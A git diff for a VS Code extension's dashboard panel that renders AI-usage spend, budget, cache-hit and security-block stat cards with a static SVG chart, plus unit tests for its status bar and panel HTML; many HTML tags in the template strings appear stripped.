The webview wiring // (which needs `vscode`) lives in panel.ts. +// +// Layout: "native stat cards" (Variant 1) — a header, a row of four stat tiles +// (Spend / Budget / Cache / Blocked) with delta-vs-yesterday chips and CSS +// bars, a pre-rendered static SVG spend trend, then a Cost-by-model table with +// share-of-spend bars and the security / MCP detail. Styled entirely with VS +// Code theme variables (`--vscode-*`) so it adapts to light, dark, and +// high-contrast themes, and rendered with NO scripts (the panel sets +// `enableScripts: false`) — the chart is a baked `<svg>`, not a charting lib. export interface Digest { total_cost_usd?: number; @@ -16,7 +24,21 @@ export interface Status { total_cost_usd?: number; blocked_requests?: number; security_events?: number; + /** Enforcement blocks vs advisory alerts — kept distinct so an alert is + * never shown as a block (mirrors the CLI's honest split). */ + security_blocked?: number; + security_alerts?: number; budget?: { daily_limit_usd?: number; spent_today_usd?: number }; + /** Per-model token rows, used to derive today's cache-hit rate. */ + breakdown?: Array<{ + input_tokens?: number; + cache_creation_tokens?: number; + cache_read_tokens?: number; + }>; + /** Dense daily-spend series (oldest → newest, zero-filled) for the SVG chart. */ + spend_series?: number[]; + /** Yesterday's baselines for the delta-vs-previous chips. */ + previous_day?: { cost_usd?: number; cache_hit_pct?: number; blocked?: number }; } function esc(s: unknown): string { @@ -30,50 +52,295 @@ function money(n: unknown): string { return `$${v.toFixed(2)}`; } +function num(n: unknown): number { + return typeof n === "number" && isFinite(n) ? 
n : 0; +} + +const GREEN = "var(--vscode-charts-green, #3fb950)"; +const RED = "var(--vscode-charts-red, #f85149)"; +const AMBER = "var(--vscode-charts-orange, #cc8a3a)"; +const MUTED = "var(--vscode-descriptionForeground)"; + +/** Theme-token colour for a "higher is worse" gauge (budget used). 
*/ +function gaugeColor(pct: number): string { + if (pct < 60) return GREEN; + if (pct < 85) return "var(--vscode-charts-yellow, #d29922)"; + return RED; +} + +type Trend = "higherBetter" | "higherWorse"; + +/** Colour for a delta given its sign and the metric's polarity. */ +function deltaColor(positive: boolean, flat: boolean, trend: Trend): string { + if (flat) return MUTED; + if ((positive && trend === "higherBetter") || (!positive && trend === "higherWorse")) return GREEN; + if (positive && trend === "higherWorse") return AMBER; + return RED; +} + +/** A percent-change chip (`▲ 12%` / `▼ 7%` / `→ 0%`) HTML, or "" when there is + * no baseline to compare against (prev == 0). Mirrors term.rs::delta_chip_pct. */ +function deltaChipPct(curr: number, prev: number, trend: Trend): string { + if (!isFinite(prev) || prev === 0) return ""; + const r = Math.round(((curr - prev) / prev) * 100); + const flat = Math.abs(r) < 1; + const text = flat ? "→ 0%" : r > 0 ? `▲ ${r}%` : `▼ ${Math.abs(r)}%`; + const color = deltaColor(r > 0, flat, trend); + return `
${esc(text)} vs yest.
`; +} + +/** An absolute-count chip (`▲ 3` / `▼ 5`), or "" when the counts are equal. */ +function deltaChipCount(curr: number, prev: number, trend: Trend): string { + if (curr === prev) return ""; + const diff = curr - prev; + const text = diff > 0 ? `▲ ${diff}` : `▼ ${Math.abs(diff)}`; + const color = deltaColor(diff > 0, false, trend); + return `
${esc(text)} vs yest.
`; +} + +/** A thin CSS progress bar filled to `pct` (0..100) in `color`. */ +function bar(pct: number, color: string): string { + const w = Math.max(0, Math.min(100, pct)); + return `
`; +} + +/** One stat tile: label, headline value, optional delta chip, bar, sub-line. */ +function card( + label: string, + value: string, + opts: { delta?: string; bar?: string; sub?: string; valueColor?: string } = {}, +): string { + const valStyle = opts.valueColor ? ` style="color:${opts.valueColor}"` : ""; + return `
+
${esc(label)}
+
${esc(value)}
+ ${opts.delta ?? ""} + ${opts.bar ?? ""} + ${opts.sub ? `
${esc(opts.sub)}
` : ""} +
`; +} + +/** Pre-rendered, script-free SVG area+line of the daily-spend series. Returns + * "" when there's nothing to plot. Colours come from theme variables, so the + * chart adapts to the user's theme exactly like the rest of the panel. */ +function spendChartSvg(series: number[] | undefined): string { + const pts = (series ?? []).filter((v) => typeof v === "number" && isFinite(v)); + if (pts.length < 2 || pts.every((v) => v <= 0)) return ""; + const W = 600; + const H = 140; + const padX = 6; + const padTop = 12; + const padBot = 10; + const max = Math.max(...pts); + const n = pts.length; + const x = (i: number) => padX + (i * (W - 2 * padX)) / (n - 1); + const y = (v: number) => { + const h = H - padTop - padBot; + const frac = max > 0 ? v / max : 0; + return padTop + (1 - frac) * h; + }; + const line = pts.map((v, i) => `${i === 0 ? "M" : "L"}${x(i).toFixed(1)},${y(v).toFixed(1)}`).join(" "); + const baseline = (H - padBot).toFixed(1); + const area = `${line} L${x(n - 1).toFixed(1)},${baseline} L${x(0).toFixed(1)},${baseline} Z`; + const lastX = x(n - 1).toFixed(1); + const lastY = y(pts[n - 1]).toFixed(1); + return `
+ + + + + + + + + +
`; +} + /** Render the panel HTML from the digest + status JSON. Pure. */ export function panelHtml(digest: Digest, status: Status): string { - const today = money(status.total_cost_usd); - const limit = status.budget?.daily_limit_usd ?? 0; - const budgetLine = - limit > 0 ? `${today} of ${money(limit)} today` : `${today} today (no daily limit set)`; + // ── derived figures ───────────────────────────────────────────────────── + const todayCost = num(status.total_cost_usd); + const turns = num(digest.turns); + const limit = num(status.budget?.daily_limit_usd); + const spent = status.budget?.spent_today_usd ?? todayCost; + const budgetPct = limit > 0 ? (num(spent) / limit) * 100 : null; + + let cacheRead = 0; + let promptTotal = 0; + for (const b of status.breakdown ?? []) { + const read = num(b.cache_read_tokens); + cacheRead += read; + promptTotal += num(b.input_tokens) + num(b.cache_creation_tokens) + read; + } + const cachePct = promptTotal > 0 ? (cacheRead / promptTotal) * 100 : null; + + const blocked = num(status.security_blocked ?? status.blocked_requests); + const alerts = num(status.security_alerts); + + const prev = status.previous_day ?? {}; + const prevCost = num(prev.cost_usd); + const prevCache = num(prev.cache_hit_pct); + const prevBlocked = num(prev.blocked); + + // ── stat tiles ────────────────────────────────────────────────────────── + const spendCard = card("Spend", money(todayCost), { + delta: deltaChipPct(todayCost, prevCost, "higherWorse"), + sub: `${turns} turn${turns === 1 ? "" : "s"}`, + }); + const budgetCard = + budgetPct !== null + ? card("Budget", `${budgetPct.toFixed(0)}%`, { + bar: bar(budgetPct, gaugeColor(budgetPct)), + sub: `of ${money(limit)} daily`, + valueColor: gaugeColor(budgetPct), + }) + : card("Budget", "no cap", { sub: "no daily limit set" }); + + const cacheCard = + cachePct !== null + ? 
card("Cache", `${cachePct.toFixed(0)}%`, { + delta: deltaChipPct(cachePct, prevCache, "higherBetter"), + bar: bar(cachePct, GREEN), + sub: "hit rate", + valueColor: GREEN, + }) + : card("Cache", "n/a", { sub: "no prompt tokens yet" }); + + const blockedCard = card("Blocked", String(blocked), { + delta: deltaChipCount(blocked, prevBlocked, "higherWorse"), + sub: `${alerts} alert${alerts === 1 ? "" : "s"}`, + valueColor: blocked > 0 ? RED : undefined, + }); + + // ── spend trend chart ─────────────────────────────────────────────────── + const series = status.spend_series ?? []; + const chart = spendChartSvg(series); + const seriesTotal = series.reduce((a, b) => a + num(b), 0); + const chartSection = chart + ? `

Spend · last ${series.length} days

+
${esc(money(seriesTotal))} total${ + deltaChipPct(todayCost, prevCost, "higherWorse") + ? `${deltaChipPct(todayCost, prevCost, "higherWorse")}` + : "" + }
+ ${chart}` + : ""; + + // ── cost-by-model table (with share-of-spend bars) ────────────────────── + const models = digest.models ?? []; + const modelTotal = models.reduce((a, m) => a + num(m.cost_usd), 0); const modelRows = - (digest.models ?? []) - .map( - (m) => - `${esc(m.provider)}/${esc(m.model)}${esc(m.requests ?? 0)}${money(m.cost_usd)}`, - ) - .join("") || `(no spend in window)`; + models + .map((m) => { + const share = modelTotal > 0 ? (num(m.cost_usd) / modelTotal) * 100 : 0; + return `${esc(m.provider)}/${esc(m.model)}${esc( + m.requests ?? 0, + )}${money(m.cost_usd)}`; + }) + .join("") || `(no spend in window)`; + // ── security + MCP detail ─────────────────────────────────────────────── const secRows = (digest.security_by_type ?? []) - .map((s) => `
  • ${esc(s.event_type)}: ${esc(s.count ?? 0)}
  • `) - .join("") || "
  • (none)
  • "; + .map((s) => `${esc(s.event_type)}: ${esc(s.count ?? 0)}`) + .join("") || `no events`; const mcpRows = (digest.mcp_tools ?? []) - .map((t) => `
  • ${esc(t.server)}/${esc(t.tool)} — ${esc(t.trust_state)}
  • `) - .join("") || "
  • (none)
  • "; + .map((t) => `${esc(t.server)}/${esc(t.tool)} · ${esc(t.trust_state)}`) + .join("") || `none`; return ` -
    🛡️ Burnwall
    -

    ${esc(budgetLine)} · ${esc(digest.turns ?? 0)} turns · ${esc(digest.blocked ?? 0)} blocked · window cost ${money(digest.total_cost_usd)}

    +

    🔥 Burnwall

    Today
    + +
    + ${spendCard} + ${budgetCard} + ${cacheCard} + ${blockedCard} +
    + + ${chartSection} -

    Cost by model (window)

    - ${modelRows}
    provider/modelreqcost
    +

    Cost by model

    + + + ${modelRows} +
    Provider / ModelReqCostShare

    Security blocks

    -
      ${secRows}
    +
    ${secRows}

    MCP tools (${esc(digest.mcp_tool_calls ?? 0)} calls)

    -
      ${mcpRows}
    +
    ${mcpRows}
    `; } diff --git a/editor/vscode/test/format.test.ts b/editor/vscode/test/format.test.ts index 225c8d5..61a71a9 100644 --- a/editor/vscode/test/format.test.ts +++ b/editor/vscode/test/format.test.ts @@ -18,9 +18,12 @@ test("summarize computes cost, blocked, cache hit rate, and budget %", () => { assert.equal(Math.round(s.budgetPercent ?? 0), 35); }); -test("combined_total_usd is preferred over total_cost_usd", () => { +test("the bar headlines the proxied total, not the combined figure (X4/U-H3)", () => { + // The proxied number is what Burnwall can vouch for; combined (proxied + + // unproxied logs) is panel detail, and previously double-counted proxied + // Claude Code into the headline. const s = summarize({ total_cost_usd: 1, combined_total_usd: 5 }); - assert.equal(s.costToday, 5); + assert.equal(s.costToday, 1); }); test("no tokens -> null cache hit rate; no limit -> null budget %", () => { @@ -52,3 +55,114 @@ test("tooltip notes when no daily limit is set", () => { const tip = tooltip(summarize({ total_cost_usd: 1 })); assert.ok(tip.includes("no daily limit set"), tip); }); + +test("subscription plan: status bar leads with the binding window, not dollars", () => { + const s = summarize({ + total_cost_usd: 190.11, + plan: { + providers: [ + { + provider: "anthropic", + status: "allowed", + windows: [ + { label: "5h", utilization: 0.17, reset_in_secs: 7007 }, + { label: "7d", utilization: 0.1, reset_in_secs: 198495 }, + ], + }, + ], + }, + }); + assert.ok(s.plan, "plan should be summarized"); + const text = statusBarText(s); + assert.ok(text.includes("5h 17% (1h56m)"), text); + assert.ok(!text.includes("$190"), text); // notional dollars suppressed + const tip = tooltip(s); + assert.ok(tip.includes("Plan (anthropic)"), tip); + assert.ok(tip.includes("7d: 10% used"), tip); +}); + +test("no plan -> dollar status bar (API / fallback)", () => { + const s = summarize({ total_cost_usd: 2, plan: null }); + assert.equal(s.plan, null); + 
assert.ok(statusBarText(s).includes("$2.00")); +}); + +test("subscription plan: throttled flag surfaces", () => { + const s = summarize({ + plan: { + providers: [ + { + provider: "anthropic", + status: "throttled", + windows: [{ label: "5h", utilization: 1.0, reset_in_secs: 600 }], + }, + ], + }, + }); + assert.ok(statusBarText(s).includes("throttled")); +}); + +test("warning-grade plan status is NOT throttled (U-H4)", () => { + const s = summarize({ + plan: { + providers: [ + { + provider: "anthropic", + status: "allowed_warning", + windows: [{ label: "5h", utilization: 0.85, reset_in_secs: 600 }], + }, + ], + }, + }); + assert.equal(s.plan?.throttled, false); + assert.ok(!statusBarText(s).includes("throttled")); +}); + +test("routed at a dead proxy beats all other status (U-C1)", () => { + const s = summarize({ + total_cost_usd: 2, + env_routing: "proxied", + proxy_running: false, + }); + assert.equal(s.proxyDown, true); + assert.ok(statusBarText(s).includes("DOWN")); + assert.ok(tooltip(s).includes("PROXY DOWN")); +}); + +test("proxy running while routed is not flagged down", () => { + const s = summarize({ + total_cost_usd: 2, + env_routing: "proxied", + proxy_running: true, + }); + assert.equal(s.proxyDown, false); +}); + +test("coverage: a bypassing tool warns in the status bar and tooltip", () => { + const s = summarize({ + total_cost_usd: 2, + coverage: [ + { tool: "Claude Code", binary: "claude", state: "protected", seen_secs_ago: 120 }, + { + tool: "Codex CLI", + binary: "codex", + state: "bypasses", + reason: "Codex on ChatGPT login routes to the ChatGPT backend", + }, + ], + }); + const text = statusBarText(s); + assert.ok(text.includes("$(warning) Codex CLI unprotected"), text); + const tip = tooltip(s); + assert.ok(tip.includes("Coverage (routes through Burnwall):"), tip); + assert.ok(tip.includes("Claude Code: protected (seen 2m ago)"), tip); + assert.ok(tip.includes("Codex CLI: NOT protected"), tip); +}); + +test("coverage: all-protected shows no 
status-bar warning", () => { + const s = summarize({ + total_cost_usd: 2, + coverage: [{ tool: "Claude Code", binary: "claude", state: "protected", seen_secs_ago: 30 }], + }); + assert.ok(!statusBarText(s).includes("unprotected")); +}); diff --git a/editor/vscode/test/panel.test.ts b/editor/vscode/test/panel.test.ts index d1af4c0..f2f3cfc 100644 --- a/editor/vscode/test/panel.test.ts +++ b/editor/vscode/test/panel.test.ts @@ -3,7 +3,7 @@ import { test } from "node:test"; import { panelHtml } from "../src/panel_view"; -test("panelHtml renders models, security, MCP, and budget", () => { +test("panelHtml renders stat cards, models, security, and MCP", () => { const html = panelHtml( { total_cost_usd: 3.5, @@ -14,13 +14,67 @@ test("panelHtml renders models, security, MCP, and budget", () => { security_by_type: [{ event_type: "path_blocked", count: 1 }], mcp_tools: [{ server: "fs", tool: "read", trust_state: "approved" }], }, - { total_cost_usd: 1.25, budget: { daily_limit_usd: 10, spent_today_usd: 1.25 } }, + { + total_cost_usd: 1.25, + budget: { daily_limit_usd: 10, spent_today_usd: 1.25 }, + security_blocked: 2, + security_alerts: 5, + breakdown: [{ input_tokens: 100, cache_creation_tokens: 0, cache_read_tokens: 900 }], + }, ); + // Spend tile + model table. + assert.ok(html.includes("$1.25"), html); assert.ok(html.includes("claude-opus-4-7"), html); assert.ok(html.includes("$3.50"), html); + // Budget tile sub-line (13% of $10.00 daily). + assert.ok(html.includes("of $10.00 daily"), html); + // Cache tile derived from the breakdown (900 read / 1000 prompt = 90%). + assert.ok(html.includes("90%"), html); + // Blocked tile uses the honest split: 2 blocked, "5 alerts". + assert.ok(html.includes("5 alerts"), html); + // Security + MCP detail. 
assert.ok(html.includes("path_blocked: 1"), html); assert.ok(html.includes("fs/read"), html); - assert.ok(html.includes("$1.25 of $10.00 today"), html); +}); + +test("panelHtml renders delta chips, SVG spend chart, and share bars", () => { + const html = panelHtml( + { + models: [ + { provider: "anthropic", model: "claude-opus-4-7", requests: 10, cost_usd: 8.0 }, + { provider: "openai", model: "gpt-4o", requests: 4, cost_usd: 2.0 }, + ], + }, + { + total_cost_usd: 0.95, + budget: { daily_limit_usd: 10, spent_today_usd: 0.95 }, + security_blocked: 1, + security_alerts: 0, + breakdown: [{ input_tokens: 100, cache_creation_tokens: 0, cache_read_tokens: 900 }], + spend_series: [0.3, 0.1, 0.4, 0.05, 0.55, 0.2, 0.95], + previous_day: { cost_usd: 0.2, cache_hit_pct: 80, blocked: 5 }, + }, + ); + // Spend up 0.20 → 0.95 ≈ +375% → up chip; cache 90 vs 80 → up chip. + assert.ok(html.includes("▲"), html); + // Fewer blocks than yesterday (1 vs 5) → a down chip. + assert.ok(html.includes("▼"), html); + // Static SVG spend chart is present (script-free ), no